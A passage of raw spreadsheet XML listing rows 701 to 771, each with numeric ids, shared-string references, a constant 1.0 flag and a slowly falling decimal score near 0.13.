        <v>1.0</v>
      </c>
      <c r="E701" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F701" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="702" ht="15.75" customHeight="1">
      <c r="A702" s="1">
        <v>26565.0</v>
      </c>
      <c r="B702" s="2">
        <v>1.784844E7</v>
      </c>
      <c r="C702" s="2" t="s">
        <v>616</v>
      </c>
      <c r="D702" s="2">
        <v>1.0</v>
      </c>
      <c r="E702" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F702" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="703" ht="15.75" customHeight="1">
      <c r="A703" s="1">
        <v>4444.0</v>
      </c>
      <c r="B703" s="2">
        <v>4.2394827E7</v>
      </c>
      <c r="C703" s="2" t="s">
        <v>617</v>
      </c>
      <c r="D703" s="2">
        <v>1.0</v>
      </c>
      <c r="E703" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F703" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="704" ht="15.75" customHeight="1">
      <c r="A704" s="1">
        <v>21065.0</v>
      </c>
      <c r="B704" s="2">
        <v>1.7848441E7</v>
      </c>
      <c r="C704" s="2" t="s">
        <v>618</v>
      </c>
      <c r="D704" s="2">
        <v>1.0</v>
      </c>
      <c r="E704" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F704" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="705" ht="15.75" customHeight="1">
      <c r="A705" s="1">
        <v>22668.0</v>
      </c>
      <c r="B705" s="2">
        <v>4.1359794E7</v>
      </c>
      <c r="C705" s="2" t="s">
        <v>619</v>
      </c>
      <c r="D705" s="2">
        <v>1.0</v>
      </c>
      <c r="E705" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F705" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="706" ht="15.75" customHeight="1">
      <c r="A706" s="1">
        <v>24996.0</v>
      </c>
      <c r="B706" s="2">
        <v>1.2690786E7</v>
      </c>
      <c r="C706" s="2" t="s">
        <v>620</v>
      </c>
      <c r="D706" s="2">
        <v>1.0</v>
      </c>
      <c r="E706" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F706" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="707" ht="15.75" customHeight="1">
      <c r="A707" s="1">
        <v>28349.0</v>
      </c>
      <c r="B707" s="2">
        <v>2.593097E7</v>
      </c>
      <c r="C707" s="2" t="s">
        <v>621</v>
      </c>
      <c r="D707" s="2">
        <v>1.0</v>
      </c>
      <c r="E707" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F707" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="708" ht="15.75" customHeight="1">
      <c r="A708" s="1">
        <v>30611.0</v>
      </c>
      <c r="B708" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C708" s="2" t="s">
        <v>619</v>
      </c>
      <c r="D708" s="2">
        <v>1.0</v>
      </c>
      <c r="E708" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F708" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="709" ht="15.75" customHeight="1">
      <c r="A709" s="1">
        <v>30783.0</v>
      </c>
      <c r="B709" s="2">
        <v>4.4816772E7</v>
      </c>
      <c r="C709" s="2" t="s">
        <v>622</v>
      </c>
      <c r="D709" s="2">
        <v>1.0</v>
      </c>
      <c r="E709" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F709" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="710" ht="15.75" customHeight="1">
      <c r="A710" s="1">
        <v>34029.0</v>
      </c>
      <c r="B710" s="2">
        <v>9545897.0</v>
      </c>
      <c r="C710" s="2" t="s">
        <v>623</v>
      </c>
      <c r="D710" s="2">
        <v>1.0</v>
      </c>
      <c r="E710" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F710" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="711" ht="15.75" customHeight="1">
      <c r="A711" s="1">
        <v>19163.0</v>
      </c>
      <c r="B711" s="2">
        <v>5.4921546E7</v>
      </c>
      <c r="C711" s="2" t="s">
        <v>624</v>
      </c>
      <c r="D711" s="2">
        <v>1.0</v>
      </c>
      <c r="E711" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F711" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="712" ht="15.75" customHeight="1">
      <c r="A712" s="1">
        <v>27514.0</v>
      </c>
      <c r="B712" s="2">
        <v>2.2165797E7</v>
      </c>
      <c r="C712" s="2" t="s">
        <v>625</v>
      </c>
      <c r="D712" s="2">
        <v>1.0</v>
      </c>
      <c r="E712" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F712" s="2">
        <v>0.1315049226441632</v>
      </c>
    </row>
    <row r="713" ht="15.75" customHeight="1">
      <c r="A713" s="1">
        <v>33806.0</v>
      </c>
      <c r="B713" s="2">
        <v>8838505.0</v>
      </c>
      <c r="C713" s="2" t="s">
        <v>626</v>
      </c>
      <c r="D713" s="2">
        <v>1.0</v>
      </c>
      <c r="E713" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F713" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="714" ht="15.75" customHeight="1">
      <c r="A714" s="1">
        <v>32545.0</v>
      </c>
      <c r="B714" s="2">
        <v>5751102.0</v>
      </c>
      <c r="C714" s="2" t="s">
        <v>627</v>
      </c>
      <c r="D714" s="2">
        <v>1.0</v>
      </c>
      <c r="E714" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F714" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="715" ht="15.75" customHeight="1">
      <c r="A715" s="1">
        <v>33815.0</v>
      </c>
      <c r="B715" s="2">
        <v>8905630.0</v>
      </c>
      <c r="C715" s="2" t="s">
        <v>548</v>
      </c>
      <c r="D715" s="2">
        <v>1.0</v>
      </c>
      <c r="E715" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F715" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="716" ht="15.75" customHeight="1">
      <c r="A716" s="1">
        <v>20807.0</v>
      </c>
      <c r="B716" s="2">
        <v>1.5323778E7</v>
      </c>
      <c r="C716" s="2" t="s">
        <v>628</v>
      </c>
      <c r="D716" s="2">
        <v>1.0</v>
      </c>
      <c r="E716" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F716" s="2">
        <v>0.1308851224105462</v>
      </c>
    </row>
    <row r="717" ht="15.75" customHeight="1">
      <c r="A717" s="1">
        <v>21109.0</v>
      </c>
      <c r="B717" s="2">
        <v>1.8185361E7</v>
      </c>
      <c r="C717" s="2" t="s">
        <v>629</v>
      </c>
      <c r="D717" s="2">
        <v>1.0</v>
      </c>
      <c r="E717" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F717" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="718" ht="15.75" customHeight="1">
      <c r="A718" s="1">
        <v>21285.0</v>
      </c>
      <c r="B718" s="2">
        <v>2.0446227E7</v>
      </c>
      <c r="C718" s="2" t="s">
        <v>603</v>
      </c>
      <c r="D718" s="2">
        <v>1.0</v>
      </c>
      <c r="E718" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F718" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="719" ht="15.75" customHeight="1">
      <c r="A719" s="1">
        <v>21346.0</v>
      </c>
      <c r="B719" s="2">
        <v>2.1229057E7</v>
      </c>
      <c r="C719" s="2" t="s">
        <v>630</v>
      </c>
      <c r="D719" s="2">
        <v>1.0</v>
      </c>
      <c r="E719" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F719" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="720" ht="15.75" customHeight="1">
      <c r="A720" s="1">
        <v>21359.0</v>
      </c>
      <c r="B720" s="2">
        <v>2.139404E7</v>
      </c>
      <c r="C720" s="2" t="s">
        <v>631</v>
      </c>
      <c r="D720" s="2">
        <v>1.0</v>
      </c>
      <c r="E720" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F720" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="721" ht="15.75" customHeight="1">
      <c r="A721" s="1">
        <v>21955.0</v>
      </c>
      <c r="B721" s="2">
        <v>2.8934837E7</v>
      </c>
      <c r="C721" s="2" t="s">
        <v>632</v>
      </c>
      <c r="D721" s="2">
        <v>1.0</v>
      </c>
      <c r="E721" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F721" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="722" ht="15.75" customHeight="1">
      <c r="A722" s="1">
        <v>26555.0</v>
      </c>
      <c r="B722" s="2">
        <v>1.7800514E7</v>
      </c>
      <c r="C722" s="2" t="s">
        <v>633</v>
      </c>
      <c r="D722" s="2">
        <v>1.0</v>
      </c>
      <c r="E722" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F722" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="723" ht="15.75" customHeight="1">
      <c r="A723" s="1">
        <v>28532.0</v>
      </c>
      <c r="B723" s="2">
        <v>2.6794396E7</v>
      </c>
      <c r="C723" s="2" t="s">
        <v>634</v>
      </c>
      <c r="D723" s="2">
        <v>1.0</v>
      </c>
      <c r="E723" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F723" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="724" ht="15.75" customHeight="1">
      <c r="A724" s="1">
        <v>28841.0</v>
      </c>
      <c r="B724" s="2">
        <v>2.8934836E7</v>
      </c>
      <c r="C724" s="2" t="s">
        <v>632</v>
      </c>
      <c r="D724" s="2">
        <v>1.0</v>
      </c>
      <c r="E724" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F724" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="725" ht="15.75" customHeight="1">
      <c r="A725" s="1">
        <v>31418.0</v>
      </c>
      <c r="B725" s="2">
        <v>5.0100331E7</v>
      </c>
      <c r="C725" s="2" t="s">
        <v>635</v>
      </c>
      <c r="D725" s="2">
        <v>1.0</v>
      </c>
      <c r="E725" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F725" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="726" ht="15.75" customHeight="1">
      <c r="A726" s="1">
        <v>31521.0</v>
      </c>
      <c r="B726" s="2">
        <v>5082628.0</v>
      </c>
      <c r="C726" s="2" t="s">
        <v>636</v>
      </c>
      <c r="D726" s="2">
        <v>1.0</v>
      </c>
      <c r="E726" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F726" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="727" ht="15.75" customHeight="1">
      <c r="A727" s="1">
        <v>1364.0</v>
      </c>
      <c r="B727" s="2">
        <v>2.6012138E7</v>
      </c>
      <c r="C727" s="2" t="s">
        <v>637</v>
      </c>
      <c r="D727" s="2">
        <v>1.0</v>
      </c>
      <c r="E727" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F727" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="728" ht="15.75" customHeight="1">
      <c r="A728" s="1">
        <v>5943.0</v>
      </c>
      <c r="B728" s="2">
        <v>4.7277072E7</v>
      </c>
      <c r="C728" s="2" t="s">
        <v>638</v>
      </c>
      <c r="D728" s="2">
        <v>1.0</v>
      </c>
      <c r="E728" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F728" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="729" ht="15.75" customHeight="1">
      <c r="A729" s="1">
        <v>7216.0</v>
      </c>
      <c r="B729" s="2">
        <v>5.0626046E7</v>
      </c>
      <c r="C729" s="2" t="s">
        <v>639</v>
      </c>
      <c r="D729" s="2">
        <v>1.0</v>
      </c>
      <c r="E729" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F729" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="730" ht="15.75" customHeight="1">
      <c r="A730" s="1">
        <v>13120.0</v>
      </c>
      <c r="B730" s="2">
        <v>3.3619964E7</v>
      </c>
      <c r="C730" s="2" t="s">
        <v>640</v>
      </c>
      <c r="D730" s="2">
        <v>1.0</v>
      </c>
      <c r="E730" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F730" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="731" ht="15.75" customHeight="1">
      <c r="A731" s="1">
        <v>14964.0</v>
      </c>
      <c r="B731" s="2">
        <v>4.1338247E7</v>
      </c>
      <c r="C731" s="2" t="s">
        <v>641</v>
      </c>
      <c r="D731" s="2">
        <v>1.0</v>
      </c>
      <c r="E731" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F731" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="732" ht="15.75" customHeight="1">
      <c r="A732" s="1">
        <v>15577.0</v>
      </c>
      <c r="B732" s="2">
        <v>4.3439333E7</v>
      </c>
      <c r="C732" s="2" t="s">
        <v>642</v>
      </c>
      <c r="D732" s="2">
        <v>1.0</v>
      </c>
      <c r="E732" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F732" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="733" ht="15.75" customHeight="1">
      <c r="A733" s="1">
        <v>21234.0</v>
      </c>
      <c r="B733" s="2">
        <v>1.970899E7</v>
      </c>
      <c r="C733" s="2" t="s">
        <v>643</v>
      </c>
      <c r="D733" s="2">
        <v>1.0</v>
      </c>
      <c r="E733" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F733" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="734" ht="15.75" customHeight="1">
      <c r="A734" s="1">
        <v>21678.0</v>
      </c>
      <c r="B734" s="2">
        <v>2.5053843E7</v>
      </c>
      <c r="C734" s="2" t="s">
        <v>644</v>
      </c>
      <c r="D734" s="2">
        <v>1.0</v>
      </c>
      <c r="E734" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F734" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="735" ht="15.75" customHeight="1">
      <c r="A735" s="1">
        <v>22307.0</v>
      </c>
      <c r="B735" s="2">
        <v>3.3716709E7</v>
      </c>
      <c r="C735" s="2" t="s">
        <v>645</v>
      </c>
      <c r="D735" s="2">
        <v>1.0</v>
      </c>
      <c r="E735" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F735" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="736" ht="15.75" customHeight="1">
      <c r="A736" s="1">
        <v>22392.0</v>
      </c>
      <c r="B736" s="2">
        <v>3.5394705E7</v>
      </c>
      <c r="C736" s="2" t="s">
        <v>646</v>
      </c>
      <c r="D736" s="2">
        <v>1.0</v>
      </c>
      <c r="E736" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F736" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="737" ht="15.75" customHeight="1">
      <c r="A737" s="1">
        <v>22742.0</v>
      </c>
      <c r="B737" s="2">
        <v>4.4173154E7</v>
      </c>
      <c r="C737" s="2" t="s">
        <v>647</v>
      </c>
      <c r="D737" s="2">
        <v>1.0</v>
      </c>
      <c r="E737" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F737" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="738" ht="15.75" customHeight="1">
      <c r="A738" s="1">
        <v>22821.0</v>
      </c>
      <c r="B738" s="2">
        <v>4.6231114E7</v>
      </c>
      <c r="C738" s="2" t="s">
        <v>648</v>
      </c>
      <c r="D738" s="2">
        <v>1.0</v>
      </c>
      <c r="E738" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F738" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="739" ht="15.75" customHeight="1">
      <c r="A739" s="1">
        <v>23038.0</v>
      </c>
      <c r="B739" s="2">
        <v>5.0101083E7</v>
      </c>
      <c r="C739" s="2" t="s">
        <v>649</v>
      </c>
      <c r="D739" s="2">
        <v>1.0</v>
      </c>
      <c r="E739" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F739" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="740" ht="15.75" customHeight="1">
      <c r="A740" s="1">
        <v>23115.0</v>
      </c>
      <c r="B740" s="2">
        <v>5.1238269E7</v>
      </c>
      <c r="C740" s="2" t="s">
        <v>650</v>
      </c>
      <c r="D740" s="2">
        <v>1.0</v>
      </c>
      <c r="E740" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F740" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="741" ht="15.75" customHeight="1">
      <c r="A741" s="1">
        <v>23226.0</v>
      </c>
      <c r="B741" s="2">
        <v>5.2854253E7</v>
      </c>
      <c r="C741" s="2" t="s">
        <v>651</v>
      </c>
      <c r="D741" s="2">
        <v>1.0</v>
      </c>
      <c r="E741" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F741" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="742" ht="15.75" customHeight="1">
      <c r="A742" s="1">
        <v>23547.0</v>
      </c>
      <c r="B742" s="2">
        <v>6049015.0</v>
      </c>
      <c r="C742" s="2" t="s">
        <v>652</v>
      </c>
      <c r="D742" s="2">
        <v>1.0</v>
      </c>
      <c r="E742" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F742" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="743" ht="15.75" customHeight="1">
      <c r="A743" s="1">
        <v>23850.0</v>
      </c>
      <c r="B743" s="2">
        <v>8219955.0</v>
      </c>
      <c r="C743" s="2" t="s">
        <v>653</v>
      </c>
      <c r="D743" s="2">
        <v>1.0</v>
      </c>
      <c r="E743" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F743" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="744" ht="15.75" customHeight="1">
      <c r="A744" s="1">
        <v>26177.0</v>
      </c>
      <c r="B744" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C744" s="2" t="s">
        <v>654</v>
      </c>
      <c r="D744" s="2">
        <v>1.0</v>
      </c>
      <c r="E744" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F744" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="745" ht="15.75" customHeight="1">
      <c r="A745" s="1">
        <v>26396.0</v>
      </c>
      <c r="B745" s="2">
        <v>1.7012851E7</v>
      </c>
      <c r="C745" s="2" t="s">
        <v>655</v>
      </c>
      <c r="D745" s="2">
        <v>1.0</v>
      </c>
      <c r="E745" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F745" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="746" ht="15.75" customHeight="1">
      <c r="A746" s="1">
        <v>26504.0</v>
      </c>
      <c r="B746" s="2">
        <v>1.7579993E7</v>
      </c>
      <c r="C746" s="2" t="s">
        <v>656</v>
      </c>
      <c r="D746" s="2">
        <v>1.0</v>
      </c>
      <c r="E746" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F746" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="747" ht="15.75" customHeight="1">
      <c r="A747" s="1">
        <v>28213.0</v>
      </c>
      <c r="B747" s="2">
        <v>2.5053842E7</v>
      </c>
      <c r="C747" s="2" t="s">
        <v>644</v>
      </c>
      <c r="D747" s="2">
        <v>1.0</v>
      </c>
      <c r="E747" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F747" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="748" ht="15.75" customHeight="1">
      <c r="A748" s="1">
        <v>29765.0</v>
      </c>
      <c r="B748" s="2">
        <v>3.4850968E7</v>
      </c>
      <c r="C748" s="2" t="s">
        <v>657</v>
      </c>
      <c r="D748" s="2">
        <v>1.0</v>
      </c>
      <c r="E748" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F748" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="749" ht="15.75" customHeight="1">
      <c r="A749" s="1">
        <v>29953.0</v>
      </c>
      <c r="B749" s="2">
        <v>3607598.0</v>
      </c>
      <c r="C749" s="2" t="s">
        <v>658</v>
      </c>
      <c r="D749" s="2">
        <v>1.0</v>
      </c>
      <c r="E749" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F749" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="750" ht="15.75" customHeight="1">
      <c r="A750" s="1">
        <v>30469.0</v>
      </c>
      <c r="B750" s="2">
        <v>3.9541151E7</v>
      </c>
      <c r="C750" s="2" t="s">
        <v>659</v>
      </c>
      <c r="D750" s="2">
        <v>1.0</v>
      </c>
      <c r="E750" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F750" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="751" ht="15.75" customHeight="1">
      <c r="A751" s="1">
        <v>30615.0</v>
      </c>
      <c r="B751" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C751" s="2" t="s">
        <v>660</v>
      </c>
      <c r="D751" s="2">
        <v>1.0</v>
      </c>
      <c r="E751" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F751" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="752" ht="15.75" customHeight="1">
      <c r="A752" s="1">
        <v>30788.0</v>
      </c>
      <c r="B752" s="2">
        <v>4.4972732E7</v>
      </c>
      <c r="C752" s="2" t="s">
        <v>661</v>
      </c>
      <c r="D752" s="2">
        <v>1.0</v>
      </c>
      <c r="E752" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F752" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="753" ht="15.75" customHeight="1">
      <c r="A753" s="1">
        <v>31020.0</v>
      </c>
      <c r="B753" s="2">
        <v>4.7776948E7</v>
      </c>
      <c r="C753" s="2" t="s">
        <v>662</v>
      </c>
      <c r="D753" s="2">
        <v>1.0</v>
      </c>
      <c r="E753" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F753" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="754" ht="15.75" customHeight="1">
      <c r="A754" s="1">
        <v>31023.0</v>
      </c>
      <c r="B754" s="2">
        <v>4.7777074E7</v>
      </c>
      <c r="C754" s="2" t="s">
        <v>662</v>
      </c>
      <c r="D754" s="2">
        <v>1.0</v>
      </c>
      <c r="E754" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F754" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="755" ht="15.75" customHeight="1">
      <c r="A755" s="1">
        <v>31156.0</v>
      </c>
      <c r="B755" s="2">
        <v>4898650.0</v>
      </c>
      <c r="C755" s="2" t="s">
        <v>663</v>
      </c>
      <c r="D755" s="2">
        <v>1.0</v>
      </c>
      <c r="E755" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F755" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="756" ht="15.75" customHeight="1">
      <c r="A756" s="1">
        <v>31420.0</v>
      </c>
      <c r="B756" s="2">
        <v>5.0101082E7</v>
      </c>
      <c r="C756" s="2" t="s">
        <v>649</v>
      </c>
      <c r="D756" s="2">
        <v>1.0</v>
      </c>
      <c r="E756" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F756" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="757" ht="15.75" customHeight="1">
      <c r="A757" s="1">
        <v>31881.0</v>
      </c>
      <c r="B757" s="2">
        <v>5.2866822E7</v>
      </c>
      <c r="C757" s="2" t="s">
        <v>664</v>
      </c>
      <c r="D757" s="2">
        <v>1.0</v>
      </c>
      <c r="E757" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F757" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="758" ht="15.75" customHeight="1">
      <c r="A758" s="1">
        <v>32042.0</v>
      </c>
      <c r="B758" s="2">
        <v>5369993.0</v>
      </c>
      <c r="C758" s="2" t="s">
        <v>665</v>
      </c>
      <c r="D758" s="2">
        <v>1.0</v>
      </c>
      <c r="E758" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F758" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="759" ht="15.75" customHeight="1">
      <c r="A759" s="1">
        <v>33116.0</v>
      </c>
      <c r="B759" s="2">
        <v>6974649.0</v>
      </c>
      <c r="C759" s="2" t="s">
        <v>666</v>
      </c>
      <c r="D759" s="2">
        <v>1.0</v>
      </c>
      <c r="E759" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F759" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="760" ht="15.75" customHeight="1">
      <c r="A760" s="1">
        <v>33562.0</v>
      </c>
      <c r="B760" s="2">
        <v>8219954.0</v>
      </c>
      <c r="C760" s="2" t="s">
        <v>653</v>
      </c>
      <c r="D760" s="2">
        <v>1.0</v>
      </c>
      <c r="E760" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F760" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="761" ht="15.75" customHeight="1">
      <c r="A761" s="1">
        <v>16618.0</v>
      </c>
      <c r="B761" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C761" s="2" t="s">
        <v>667</v>
      </c>
      <c r="D761" s="2">
        <v>1.0</v>
      </c>
      <c r="E761" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F761" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="762" ht="15.75" customHeight="1">
      <c r="A762" s="1">
        <v>34025.0</v>
      </c>
      <c r="B762" s="2">
        <v>9519241.0</v>
      </c>
      <c r="C762" s="2" t="s">
        <v>668</v>
      </c>
      <c r="D762" s="2">
        <v>1.0</v>
      </c>
      <c r="E762" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F762" s="2">
        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="763" ht="15.75" customHeight="1">
      <c r="A763" s="1">
        <v>19528.0</v>
      </c>
      <c r="B763" s="2">
        <v>5.5977992E7</v>
      </c>
      <c r="C763" s="5" t="s">
        <v>669</v>
      </c>
      <c r="D763" s="2">
        <v>1.0</v>
      </c>
      <c r="E763" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F763" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="764" ht="15.75" customHeight="1">
      <c r="A764" s="1">
        <v>24668.0</v>
      </c>
      <c r="B764" s="2">
        <v>1.1565483E7</v>
      </c>
      <c r="C764" s="2" t="s">
        <v>670</v>
      </c>
      <c r="D764" s="2">
        <v>1.0</v>
      </c>
      <c r="E764" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F764" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="765" ht="15.75" customHeight="1">
      <c r="A765" s="1">
        <v>30937.0</v>
      </c>
      <c r="B765" s="2">
        <v>4.7229808E7</v>
      </c>
      <c r="C765" s="2" t="s">
        <v>671</v>
      </c>
      <c r="D765" s="2">
        <v>1.0</v>
      </c>
      <c r="E765" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F765" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="766" ht="15.75" customHeight="1">
      <c r="A766" s="1">
        <v>31935.0</v>
      </c>
      <c r="B766" s="2">
        <v>5305124.0</v>
      </c>
      <c r="C766" s="2" t="s">
        <v>672</v>
      </c>
      <c r="D766" s="2">
        <v>1.0</v>
      </c>
      <c r="E766" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F766" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="767" ht="15.75" customHeight="1">
      <c r="A767" s="1">
        <v>32097.0</v>
      </c>
      <c r="B767" s="2">
        <v>5399868.0</v>
      </c>
      <c r="C767" s="2" t="s">
        <v>673</v>
      </c>
      <c r="D767" s="2">
        <v>1.0</v>
      </c>
      <c r="E767" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F767" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="768" ht="15.75" customHeight="1">
      <c r="A768" s="1">
        <v>20997.0</v>
      </c>
      <c r="B768" s="2">
        <v>1.7154829E7</v>
      </c>
      <c r="C768" s="2" t="s">
        <v>674</v>
      </c>
      <c r="D768" s="2">
        <v>1.0</v>
      </c>
      <c r="E768" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F768" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="769" ht="15.75" customHeight="1">
      <c r="A769" s="1">
        <v>21860.0</v>
      </c>
      <c r="B769" s="2">
        <v>2.7322415E7</v>
      </c>
      <c r="C769" s="2" t="s">
        <v>675</v>
      </c>
      <c r="D769" s="2">
        <v>1.0</v>
      </c>
      <c r="E769" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F769" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="770" ht="15.75" customHeight="1">
      <c r="A770" s="1">
        <v>22114.0</v>
      </c>
      <c r="B770" s="2">
        <v>3.0976303E7</v>
      </c>
      <c r="C770" s="2" t="s">
        <v>676</v>
      </c>
      <c r="D770" s="2">
        <v>1.0</v>
      </c>
      <c r="E770" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F770" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="771" ht="15.75" customHeight="1">
      <c r="A771" s="1">
        <v>23319.0</v>
      </c>
      <c r="B771" s="2">
        <v>5.4355646E7</v>
      </c>
      <c r="C771" s="2" t="s">
        <v>677</v>
